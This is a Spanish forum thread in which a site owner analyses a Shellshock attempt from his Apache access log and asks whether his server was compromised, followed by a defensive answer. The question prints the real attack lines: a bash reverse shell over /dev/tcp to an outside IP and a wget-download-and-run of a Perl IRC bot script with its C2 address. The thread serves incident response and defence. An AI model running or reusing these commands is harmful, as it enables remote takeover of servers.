¿Qué hace este intento de explotación de Shellshock? ¿Se ha comprometido mi sitio web?

8

Hoy he consultado el access.log de mi Apache para la ahora infame cadena () { , y además de un montón de lo que parecían pings para verificar cuántos servidores son vulnerables, encontré este intento, que parecía un ataque genuino:

94.23.193.131 - - [26/Sep/2014:05:48:53 +0200] "GET / HTTP/1.0" 200 29271 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

Lo que hice a continuación fue ver lo que hizo la conexión TCP; Caté el resultado de esto:

user@localhost:~# cat < /dev/tcp/195.225.34.101/3333
cat < /dev/tcp/195.225.34.101/3333
wget -O /tmp/.lCE-unix http://202.137.176.146/icons/xt.dat;perl /tmp/.lCE-unix 81.18.135.38 443;rm -rf /tmp/.lCE-unix;uptime

Si lo leo bien, se queda con un script de Perl alojado en http://202.137.176.146/icons/xt.dat ( Copia del script en Pastebin ), lo envía a /tmp/.lCE-unix, lo ejecuta y luego se elimina de nuevo.

Mirando el script en sí, lo que creo que estoy viendo es que intenta conectarse a un servidor IRC en IP 81.18.135.38, puerto 443, usando una contraseña de conexión 45QOhktzhwR4Ai, usuario 'opus', luego intenta unirse canal '## n3' (si tengo razón).

Admito que solo quería compartir esto en algún lugar. Preguntas reales sin embargo:

  1. El ataque fue manejado por Apache, que probablemente reenvió la solicitud a Wordpress alojado en /, una versión 3.x. No creo que haya sido ejecutado por Bash, pero ¿alguien puede confirmar esto?
  2. ¿Cómo puedo verificar si el ataque fue exitoso? He ejecutado comandos como netstat y lsof pero no pude encontrar ninguna conexión fuera de lo común, además de mi propia sesión SSH, el servidor web, etc. No hay conexiones a ninguna de las direcciones IP dadas, no hay procesos Perl en ejecución.
  3. ¿Es esta una hazaña conocida? No pude encontrar mucho en una búsqueda, aunque hay un hilo en la lista de correo de Redhat de 2005, que parece hacer referencia al archivo.
  4. ¿Debo informar algunas de esas direcciones IP a las autoridades? Y si es así, ¿cuál? Puedo imaginar al FBI y a quienes no les gustaría eliminar el servidor C & C al que se hace referencia.
pregunta fwielstra 26.09.2014 - 10:42
fuente

1 respuesta

4
  1. Si usas el módulo de apache php o fastcgi y no CGI, el parámetro nunca llegará a bash. Incluso si usas CGI, solo se podría golpear si Wordpress de alguna manera se llama un script de bash durante su ejecución (alguien con más conocimientos de Wordpress podría decir la probabilidad de que eso ocurra).
  2. Podría monitorear las conexiones de red sospechosas con lsof y netstat, pero si el atacante eliminó un rootkit, podría ocultarse de esas herramientas. Puede verificar su sistema desconectándolo, arrancando desde un medio diferente y haciendo algunas comprobaciones de integridad (debsums, rkhunter, etc.). Para instalar un rootkit, el atacante también necesitaría un exploit de raíz local, ya que este ataque solo obtendría un shell para el usuario del servidor web.
  3. Lo siento, no lo sé, pero tomar controles del IRC es bastante común para los bots AFAIK, así que en el sentido general parece un ataque bastante común aplicado con shell shock.
  4. Podrías, y puede ser útil incluso si el atacante es un bot en sí mismo (esto es probable). Sin embargo, si se trata de un nodo de salida TOR, la dirección IP no contiene ninguna información útil.
respondido por el P.Péter 26.09.2014 - 11:14
fuente

Lea otras preguntas en las etiquetas